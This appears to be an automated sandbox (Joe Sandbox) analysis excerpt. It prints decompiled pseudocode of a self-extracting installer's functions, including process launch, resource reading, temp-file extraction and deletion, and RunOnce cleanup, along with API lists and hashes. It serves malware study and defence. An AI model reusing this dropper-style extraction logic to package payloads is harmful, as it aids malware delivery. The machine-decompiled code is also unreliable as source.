					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E002144B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x218a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x219a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x219a2c = _t44;
						}
					}
				}
				E0021411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x219a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                        0x00213fef
                                                                                                                                                                                                        0x00213ffa
                                                                                                                                                                                                        0x00214001
                                                                                                                                                                                                        0x00214008
                                                                                                                                                                                                        0x0021400a
                                                                                                                                                                                                        0x0021400b
                                                                                                                                                                                                        0x00214010
                                                                                                                                                                                                        0x0021410a
                                                                                                                                                                                                        0x0021411a
                                                                                                                                                                                                        0x0021411a
                                                                                                                                                                                                        0x0021401c
                                                                                                                                                                                                        0x0021401d
                                                                                                                                                                                                        0x0021401e
                                                                                                                                                                                                        0x0021401f
                                                                                                                                                                                                        0x00214033
                                                                                                                                                                                                        0x0021403b
                                                                                                                                                                                                        0x002140ca
                                                                                                                                                                                                        0x002140e9
                                                                                                                                                                                                        0x002140f8
                                                                                                                                                                                                        0x00214101
                                                                                                                                                                                                        0x00214106
                                                                                                                                                                                                        0x00214106
                                                                                                                                                                                                        0x00214108
                                                                                                                                                                                                        0x00214108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214108
                                                                                                                                                                                                        0x00214049
                                                                                                                                                                                                        0x0021405c
                                                                                                                                                                                                        0x00214062
                                                                                                                                                                                                        0x00214068
                                                                                                                                                                                                        0x0021406e
                                                                                                                                                                                                        0x00214070
                                                                                                                                                                                                        0x00214077
                                                                                                                                                                                                        0x0021407f
                                                                                                                                                                                                        0x00214089
                                                                                                                                                                                                        0x0021408b
                                                                                                                                                                                                        0x0021408b
                                                                                                                                                                                                        0x00214089
                                                                                                                                                                                                        0x00214077
                                                                                                                                                                                                        0x00214091
                                                                                                                                                                                                        0x0021409c
                                                                                                                                                                                                        0x002140a8
                                                                                                                                                                                                        0x002140b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002140c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002140c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 00214033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00214049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 0021405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0021409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002140A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002140DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 002140E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 9a156749d79e9ae6b154179697916cc8032a06dafe66c1a94179b9bfc1ffea55
                                                                                                                                                                                                        • Instruction ID: dd01dd99e6d51a2dd391445792ce41e710ca32ebc9816f398b16a671ad23dc94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a156749d79e9ae6b154179697916cc8032a06dafe66c1a94179b9bfc1ffea55
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1318F31651218BBEB20AF65EC4CFEB77B8EBB8710F2041A9F90DA2161CA304DD5CE51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002151E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002151E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0021468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0021468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E002144B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x219124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x219124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x219124 = 0x80070714;
					goto L10;
				}
				E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x219124 = E00216285();
				goto L10;
			}






                                                                                                                                                                                                        0x002151fb
                                                                                                                                                                                                        0x00215207
                                                                                                                                                                                                        0x0021520b
                                                                                                                                                                                                        0x0021523c
                                                                                                                                                                                                        0x00215268
                                                                                                                                                                                                        0x00215270
                                                                                                                                                                                                        0x0021528b
                                                                                                                                                                                                        0x00215293
                                                                                                                                                                                                        0x0021529c
                                                                                                                                                                                                        0x002152a6
                                                                                                                                                                                                        0x002152b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002152b0
                                                                                                                                                                                                        0x0021529e
                                                                                                                                                                                                        0x00215279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021527b
                                                                                                                                                                                                        0x00215273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215273
                                                                                                                                                                                                        0x0021524a
                                                                                                                                                                                                        0x00215250
                                                                                                                                                                                                        0x00215256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215256
                                                                                                                                                                                                        0x00215219
                                                                                                                                                                                                        0x00215223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F4D,?,00000002,00000000), ref: 00215201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00215250
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 1b1ebdd33ac093e9f244b8ec08a16d6987b19321c2b899f561b115a10c3fa61b
                                                                                                                                                                                                        • Instruction ID: 6227db1e5e8fb97448fe502e23d7a6ad207da226fa58679c1441b32ae754e3d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b1ebdd33ac093e9f244b8ec08a16d6987b19321c2b899f561b115a10c3fa61b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5011E676261612BBE3246B716C5DBFB61DDDBF9740B108029FB0AD5190DEB98CE04924
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002152B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E002152B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x218004; // 0x58ac7c6d
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x2191e0; // 0x30b8f48
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x218a24 == 0 &&  *0x219a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x218a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x218a24 == 0 &&  *0x219a30 == 0) {
					_push(_t22);
					E00211781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					if(( *0x219a34 & 0x00000020) != 0) {
						E002165E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00212390( &_v268);
					_t11 =  *0x218a20; // 0x0
				}
				if( *0x219a40 != 1 && _t11 != 0) {
					_t11 = E00211FE1(_t22); // executed
				}
				 *0x218a20 =  *0x218a20 & 0x00000000;
				return E00216CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                        0x002152b6
                                                                                                                                                                                                        0x002152b6
                                                                                                                                                                                                        0x002152b6
                                                                                                                                                                                                        0x002152c1
                                                                                                                                                                                                        0x002152c8
                                                                                                                                                                                                        0x002152cb
                                                                                                                                                                                                        0x002152cc
                                                                                                                                                                                                        0x002152d4
                                                                                                                                                                                                        0x002152d6
                                                                                                                                                                                                        0x002152d7
                                                                                                                                                                                                        0x002152de
                                                                                                                                                                                                        0x002152e0
                                                                                                                                                                                                        0x002152f2
                                                                                                                                                                                                        0x002152fa
                                                                                                                                                                                                        0x002152fa
                                                                                                                                                                                                        0x00215302
                                                                                                                                                                                                        0x00215305
                                                                                                                                                                                                        0x0021530c
                                                                                                                                                                                                        0x00215312
                                                                                                                                                                                                        0x00215316
                                                                                                                                                                                                        0x00215316
                                                                                                                                                                                                        0x00215317
                                                                                                                                                                                                        0x0021531c
                                                                                                                                                                                                        0x0021531f
                                                                                                                                                                                                        0x00215333
                                                                                                                                                                                                        0x00215345
                                                                                                                                                                                                        0x00215351
                                                                                                                                                                                                        0x00215359
                                                                                                                                                                                                        0x00215359
                                                                                                                                                                                                        0x00215363
                                                                                                                                                                                                        0x00215369
                                                                                                                                                                                                        0x0021536f
                                                                                                                                                                                                        0x00215374
                                                                                                                                                                                                        0x00215374
                                                                                                                                                                                                        0x00215381
                                                                                                                                                                                                        0x00215387
                                                                                                                                                                                                        0x00215387
                                                                                                                                                                                                        0x0021538f
                                                                                                                                                                                                        0x002153a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(030B8F48,00000080,?,00000000), ref: 002152F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(030B8F48), ref: 002152FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(030B8F48,?,00000000), ref: 00215305
                                                                                                                                                                                                        • LocalFree.KERNEL32(030B8F48), ref: 0021530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(002111FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00215363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00215334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-1116576409
                                                                                                                                                                                                        • Opcode ID: 12cdc41d8605fe9827ab9ec5831f6a37fc2850b32bfaf79766575e3583a87218
                                                                                                                                                                                                        • Instruction ID: 51873df1f9580376d2e3598955e7843e98c745d84ce603e3e66492b91f86f306
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12cdc41d8605fe9827ab9ec5831f6a37fc2850b32bfaf79766575e3583a87218
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121DB31921625DBCB219F20FC8CBE977E0AF74780F1481A9E886531A0CFB05DE8CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00211FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00211FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x218530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                        0x00211fee
                                                                                                                                                                                                        0x00212005
                                                                                                                                                                                                        0x0021200d
                                                                                                                                                                                                        0x00212017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212020
                                                                                                                                                                                                        0x0021200d
                                                                                                                                                                                                        0x00212029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0021538C,?,?,0021538C), ref: 00212005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(0021538C,wextract_cleanup1,?,?,0021538C), ref: 00212017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(0021538C,?,?,0021538C), ref: 00212020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 849931509-1592051331
                                                                                                                                                                                                        • Opcode ID: e995269385fb87aba3d6bcd46396bf66b0a02169732196a9bbc16e86322af273
                                                                                                                                                                                                        • Instruction ID: 07528238802b128a0b0e27d4e9ef13100d0fb8e82abdfb210a0bb019a4107f41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e995269385fb87aba3d6bcd46396bf66b0a02169732196a9bbc16e86322af273
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91E04F30561318FFD7218F90FD4EFEA7BAAEB39780F100294B904A0061EF615AA4D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00214CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00214CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x218004; // 0x58ac7c6d
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x2191d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00214E99(_t75);
						L35:
						return E00216CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x218584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x2191e4;
						_t58 = 0x2191e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x2191e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x2191e4;
						_t30 = E00214702( &_v268, 0x2191e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0021476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00214980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E002147E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x2193f4 =  *0x2193f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x2191e4;
						_t63 = 0x2191e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x2191e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x2191e4;
						_t30 = E00214702( &_v268, 0x2191e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00214C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00214B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00214B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                        0x00214cd0
                                                                                                                                                                                                        0x00214cdb
                                                                                                                                                                                                        0x00214ce0
                                                                                                                                                                                                        0x00214ce2
                                                                                                                                                                                                        0x00214cee
                                                                                                                                                                                                        0x00214cf2
                                                                                                                                                                                                        0x00214d0e
                                                                                                                                                                                                        0x00214d0e
                                                                                                                                                                                                        0x00214d11
                                                                                                                                                                                                        0x00214e83
                                                                                                                                                                                                        0x00214e88
                                                                                                                                                                                                        0x00214e98
                                                                                                                                                                                                        0x00214e98
                                                                                                                                                                                                        0x00214d17
                                                                                                                                                                                                        0x00214d17
                                                                                                                                                                                                        0x00214d1a
                                                                                                                                                                                                        0x00214d2f
                                                                                                                                                                                                        0x00214d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d2f
                                                                                                                                                                                                        0x00214d1c
                                                                                                                                                                                                        0x00214d1c
                                                                                                                                                                                                        0x00214d1f
                                                                                                                                                                                                        0x00214dcb
                                                                                                                                                                                                        0x00214dd0
                                                                                                                                                                                                        0x00214dd2
                                                                                                                                                                                                        0x00214ddd
                                                                                                                                                                                                        0x00214ddd
                                                                                                                                                                                                        0x00214de3
                                                                                                                                                                                                        0x00214de8
                                                                                                                                                                                                        0x00214ded
                                                                                                                                                                                                        0x00214ded
                                                                                                                                                                                                        0x00214def
                                                                                                                                                                                                        0x00214df0
                                                                                                                                                                                                        0x00214df0
                                                                                                                                                                                                        0x00214df4
                                                                                                                                                                                                        0x00214df4
                                                                                                                                                                                                        0x00214df6
                                                                                                                                                                                                        0x00214df9
                                                                                                                                                                                                        0x00214dfc
                                                                                                                                                                                                        0x00214dfc
                                                                                                                                                                                                        0x00214dfe
                                                                                                                                                                                                        0x00214dff
                                                                                                                                                                                                        0x00214dff
                                                                                                                                                                                                        0x00214e03
                                                                                                                                                                                                        0x00214e08
                                                                                                                                                                                                        0x00214e0a
                                                                                                                                                                                                        0x00214e0f
                                                                                                                                                                                                        0x00214d03
                                                                                                                                                                                                        0x00214d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d03
                                                                                                                                                                                                        0x00214e18
                                                                                                                                                                                                        0x00214e20
                                                                                                                                                                                                        0x00214e25
                                                                                                                                                                                                        0x00214e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214e33
                                                                                                                                                                                                        0x00214e38
                                                                                                                                                                                                        0x00214e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214e40
                                                                                                                                                                                                        0x00214e51
                                                                                                                                                                                                        0x00214e56
                                                                                                                                                                                                        0x00214e5b
                                                                                                                                                                                                        0x00214e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214e6a
                                                                                                                                                                                                        0x00214e6f
                                                                                                                                                                                                        0x00214e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214e77
                                                                                                                                                                                                        0x00214e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214e7d
                                                                                                                                                                                                        0x00214d25
                                                                                                                                                                                                        0x00214d25
                                                                                                                                                                                                        0x00214d28
                                                                                                                                                                                                        0x00214d36
                                                                                                                                                                                                        0x00214d3b
                                                                                                                                                                                                        0x00214d40
                                                                                                                                                                                                        0x00214d40
                                                                                                                                                                                                        0x00214d42
                                                                                                                                                                                                        0x00214d43
                                                                                                                                                                                                        0x00214d43
                                                                                                                                                                                                        0x00214d47
                                                                                                                                                                                                        0x00214d4a
                                                                                                                                                                                                        0x00214d4a
                                                                                                                                                                                                        0x00214d4c
                                                                                                                                                                                                        0x00214d4f
                                                                                                                                                                                                        0x00214d4f
                                                                                                                                                                                                        0x00214d51
                                                                                                                                                                                                        0x00214d52
                                                                                                                                                                                                        0x00214d52
                                                                                                                                                                                                        0x00214d56
                                                                                                                                                                                                        0x00214d5b
                                                                                                                                                                                                        0x00214d5d
                                                                                                                                                                                                        0x00214d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d67
                                                                                                                                                                                                        0x00214d6f
                                                                                                                                                                                                        0x00214d74
                                                                                                                                                                                                        0x00214d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d7c
                                                                                                                                                                                                        0x00214d84
                                                                                                                                                                                                        0x00214d89
                                                                                                                                                                                                        0x00214d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214d94
                                                                                                                                                                                                        0x00214d99
                                                                                                                                                                                                        0x00214d9e
                                                                                                                                                                                                        0x00214da1
                                                                                                                                                                                                        0x00214daa
                                                                                                                                                                                                        0x00214daa
                                                                                                                                                                                                        0x00214da3
                                                                                                                                                                                                        0x00214da3
                                                                                                                                                                                                        0x00214da3
                                                                                                                                                                                                        0x00214db5
                                                                                                                                                                                                        0x00214dbb
                                                                                                                                                                                                        0x00214dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214dc3
                                                                                                                                                                                                        0x00214dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214dc5
                                                                                                                                                                                                        0x00214dbd
                                                                                                                                                                                                        0x00214d2a
